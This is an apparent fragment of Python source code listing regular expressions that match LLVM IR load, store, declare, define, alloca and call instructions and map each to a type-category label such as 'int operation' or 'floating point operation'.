['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80\*>, .*', '<d x float*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float\*>, .*', '<d x float*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double\*>, .*', '<d x double*> operation',
'<d x floating point*> operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i24>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i40>\*, .*', '<d x i40>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x i128>\*, .*', '<d x i128>* operation', '<d x int>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>\*, .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>\*, .*', '<d x structure>* operation',
'<d x structure>* operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x x86_fp80>\*\*, .*', '<d x float>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x float>\*\*, .*', '<d x float>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x double>\*\*, .*', '<d x double>** operation',
'<d x floating point>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?<\d+ x \{ .* \}>\*\*, .*', '<d x structure>** operation',
'<d x structure>** operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i24\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i40\], .*', '[d x i40] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x x86_fp80\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x float\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x double\], .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\], .*', '[d x structure] operation',
'[d x structure] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i1\]\*, .*', '[d x i1]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i2\]\*, .*', '[d x i2]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i4\]\*, .*', '[d x i4]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i8\]\*, .*', '[d x i8]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i16\]\*, .*', '[d x i16]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i32\]\*, .*', '[d x i32]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i40\]\*, .*', '[d x i40]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i64\]\*, .*', '[d x i64]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x i128\]\*, .*', '[d x i128]* operation', '[d x int]* operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x x86_fp80\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x float\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x double\]\*, .*', '[d x double]* operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\]\*, .*', '[d x structure]* operation',
'[d x floating point] operation'],
['<%ID> = load ' + any_of(opt_load) + '?.*\(.*\)\*+, .*', 'function operation', 'function operation'],
['store ' + any_of(opt_load) + '?i1 .*', 'i1 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i2 .*', 'i2 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i4 .*', 'i4 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i8 .*', 'i8 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i16 .*', 'i16 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i24 .*', 'i16 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i32 .*', 'i32 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i40 .*', 'i32 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i64 .*', 'i64 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i128 .*', 'i128 operation', 'int operation'],
['store ' + any_of(opt_load) + '?i1\* .*', 'i1* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i2\* .*', 'i2* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i4\* .*', 'i4* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i8\* .*', 'i8* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i16\* .*', 'i16* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i32\* .*', 'i32* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i64\* .*', 'i64* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i128\* .*', 'i128* operation', 'int* operation'],
['store ' + any_of(opt_load) + '?i1\*\* .*', 'i1** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i2\*\* .*', 'i2** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i4\*\* .*', 'i4** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i8\*\* .*', 'i8** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i16\*\* .*', 'i16** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i32\*\* .*', 'i32** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i64\*\* .*', 'i64** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?i128\*\* .*', 'i128** operation', 'int** operation'],
['store ' + any_of(opt_load) + '?x86_fp80 .*', 'float operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?float .*', 'float operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?double .*', 'double operation', 'floating point operation'],
['store ' + any_of(opt_load) + '?x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?float\* .*', 'float* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?double\* .*', 'double* operation', 'floating point* operation'],
['store ' + any_of(opt_load) + '?x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?float\*\* .*', 'float** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?double\*\* .*', 'double** operation', 'floating point** operation'],
['store ' + any_of(opt_load) + '?void \(.*', 'function op', 'function op'],
['store ' + any_of(opt_load) + '?%".*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<%.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<?{.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?opaque.*', 'struct/class op', 'struct/class op'],
['store ' + any_of(opt_load) + '?<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}> .*', '<d x \{ .* \}> operation', '<d x \{ .* \}> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80\*> .*', '<d x float*> operation',
'<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x double\*> .*', '<d x double*> operation',
'<d x floating point*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}\*> .*', '<d x \{ .* \}*> operation', '<d x \{ .* \}*> operation'],
['store ' + any_of(opt_load) + '?<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x x86_fp80>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x \{ .* \}\*?>\* .*', '<d x struct>* operation', '<d x \{ .* \}>* operation'],
['store ' + any_of(opt_load) + '?<\d+ x void \(.*', '<d x function>* operation', '<d x function operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x x86_fp80\] .*', '[d x float] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
['store ' + any_of(opt_load) + '?\[\d+ x \{ .* \}\] .*', '[d x structure] operation', '[d x structure] operation'],
['declare (noalias |nonnull )*void .*', 'void operation', 'void operation'],
['declare (noalias |nonnull )*i1 .*', 'i1 operation', 'int operation'],
['declare (noalias |nonnull )*i2 .*', 'i2 operation', 'int operation'],
['declare (noalias |nonnull )*i4 .*', 'i4 operation', 'int operation'],
['declare (noalias |nonnull )*i8 .*', 'i8 operation', 'int operation'],
['declare (noalias |nonnull )*i16 .*', 'i16 operation', 'int operation'],
['declare (noalias |nonnull )*i32 .*', 'i32 operation', 'int operation'],
['declare (noalias |nonnull )*i64 .*', 'i64 operation', 'int operation'],
['declare (noalias |nonnull )*i8\* .*', 'i8* operation', 'int* operation'],
['declare (noalias |nonnull )*i16\* .*', 'i16* operation', 'int* operation'],
['declare (noalias |nonnull )*i32\* .*', 'i32* operation', 'int* operation'],
['declare (noalias |nonnull )*i64\* .*', 'i64* operation', 'int* operation'],
['declare (noalias |nonnull )*x86_fp80 .*', 'float operation', 'floating point operation'],
['declare (noalias |nonnull )*float .*', 'float operation', 'floating point operation'],
['declare (noalias |nonnull )*double .*', 'double operation', 'floating point operation'],
['declare (noalias |nonnull )*x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['declare (noalias |nonnull )*float\* .*', 'float* operation', 'floating point* operation'],
['declare (noalias |nonnull )*double\* .*', 'double* operation', 'floating point* operation'],
['declare (noalias |nonnull )*%".*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<%.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<?{.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*opaque.*', 'struct/class op', 'struct/class op'],
['declare (noalias |nonnull )*<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['declare (noalias |nonnull )*<\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['declare (noalias |nonnull )*<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['declare (noalias |nonnull )*<\d+ x x86_fp80>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*<\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*<\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['declare (noalias |nonnull )*\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['declare (noalias |nonnull )*\[\d+ x x86_fp80\] .*', '[d x float] operation', '[d x floating point] operation'],
['declare (noalias |nonnull )*\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['declare (noalias |nonnull )*\[\d+ x double\] .*', '[d x double] operation', '[d x floating point] operation'],
['define ' + any_of(opt_define) + '+void .*', 'void operation', 'void operation'],
['define ' + any_of(opt_define) + '+i1 .*', 'i1 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i2 .*', 'i2 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i4 .*', 'i4 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i8 .*', 'i8 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i16 .*', 'i16 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i32 .*', 'i32 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i64 .*', 'i64 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i128 .*', 'i128 operation', 'int operation'],
['define ' + any_of(opt_define) + '+i1\* .*', 'i1* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i2\* .*', 'i2* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i4\* .*', 'i4* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i8\* .*', 'i8* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i16\* .*', 'i16* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i32\* .*', 'i32* operation', 'int* operation'],
# TODO***********************************************************************************0
['store ' + any_of(opt_load) + '?float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['store ' + any_of(opt_load) + '?float\*\*\*\* .*', 'float**** operation', 'floating point**** operation'],
['define ' + any_of(opt_define) + '+i32\*\* .*', 'i32** operation', 'int** operation'],
['define ' + any_of(opt_define) + '+i32\*\*\* .*', 'i32*** operation', 'int*** operation'],
['define ' + any_of(opt_define) + '+i32\*\*\*\* .*', 'i32**** operation', 'int**** operation'],
['define ' + any_of(opt_define) + '+float\*\* .*', 'float** operation', 'floating point** operation'],
['define ' + any_of(opt_define) + '+float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['define ' + any_of(opt_define) + '+float\*\*\*\* .*', 'float**** operation', 'floating point**** operation'],
['<%ID> = alloca i1\*\*($|,).*', 'i1** operation', 'int** operation'],
['<%ID> = alloca i2\*\*($|,).*', 'i2** operation', 'int** operation'],
['<%ID> = alloca i4\*\*($|,).*', 'i4** operation', 'int** operation'],
['<%ID> = alloca i8\*\*($|,).*', 'i8** operation', 'int** operation'],
['<%ID> = alloca i16\*\*($|,).*', 'i16** operation', 'int** operation'],
['<%ID> = alloca i32\*\*($|,).*', 'i32** operation', 'int** operation'],
['<%ID> = alloca i64\*\*($|,).*', 'i64** operation', 'int** operation'],
['<%ID> = alloca i128\*\*($|,).*', 'i128** operation', 'int** operation'],
['<%ID> = alloca i1\*\*\*($|,).*', 'i1*** operation', 'int*** operation'],
['<%ID> = alloca i2\*\*\*($|,).*', 'i2*** operation', 'int*** operation'],
['<%ID> = alloca i4\*\*\*($|,).*', 'i4*** operation', 'int*** operation'],
['<%ID> = alloca i8\*\*\*($|,).*', 'i8*** operation', 'int*** operation'],
['<%ID> = alloca i16\*\*\*($|,).*', 'i16*** operation', 'int*** operation'],
['<%ID> = alloca i32\*\*\*($|,).*', 'i32*** operation', 'int*** operation'],
['<%ID> = alloca i64\*\*\*($|,).*', 'i64*** operation', 'int*** operation'],
['<%ID> = alloca i128\*\*\*($|,).*', 'i128*** operation', 'int*** operation'],
['<%ID> = alloca x86_fp80\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca float\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca x86_fp80\*\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca float\*\*\*($|,).*', 'float*** operation', 'floating point*** operation'],
['<%ID> = alloca double\*\*($|,).*', 'double** operation', 'floating point** operation'],
['<%ID> = alloca double\*\*\*($|,).*', 'double*** operation', 'floating point*** operation'],
# ***********************************************************************************1
['define ' + any_of(opt_define) + '+i64\* .*', 'i64* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+i128\* .*', 'i128* operation', 'int* operation'],
['define ' + any_of(opt_define) + '+x86_fp80 .*', 'float operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+float .*', 'float operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+double .*', 'double operation', 'floating point operation'],
['define ' + any_of(opt_define) + '+x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+float\* .*', 'float* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+double\* .*', 'double* operation', 'floating point* operation'],
['define ' + any_of(opt_define) + '+%".*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<%.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<?{.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+opaque.*', 'struct/class op', 'struct/class op'],
['define ' + any_of(opt_define) + '+<\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['define ' + any_of(opt_define) + '+<\d+ x x86_fp80> .*', '<d x float> operation',
'<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['define ' + any_of(opt_define) + '+<\d+ x i1>\* .*', '<d x i1>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i2>\* .*', '<d x i2>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i4>\* .*', '<d x i4>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i8>\* .*', '<d x i8>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i16>\* .*', '<d x i16>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i32>\* .*', '<d x i32>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i64>\* .*', '<d x i64>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x i128>\* .*', '<d x i128>* operation', '<d x int>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x x86_fp80>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x float>\* .*', '<d x float>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+<\d+ x double>\* .*', '<d x double>* operation',
'<d x floating point>* operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i1\] .*', '[d x i1] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i2\] .*', '[d x i2] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i4\] .*', '[d x i4] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i8\] .*', '[d x i8] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i16\] .*', '[d x i16] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i32\] .*', '[d x i32] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i64\] .*', '[d x i64] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x i128\] .*', '[d x i128] operation', '[d x int] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x x86_fp80\] .*', '[d x float] operation',
'[d x floating point] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x float\] .*', '[d x float] operation', '[d x floating point] operation'],
['define ' + any_of(opt_define) + '+\[\d+ x double\] .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1 .*', 'i1 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2 .*', 'i2 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4 .*', 'i4 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8 .*', 'i8 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16 .*', 'i16 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32 .*', 'i32 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64 .*', 'i64 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128 .*', 'i128 operation', 'int operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i128\* .*', 'i128* operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i1\*\* .*', 'i1** operation',
'int* operation'],
['<%ID> = (tail |musttail |notail )?call ' + any_of(opt_invoke) + '*i2\*\* .*', 'i2** operation',
'int* operation'],
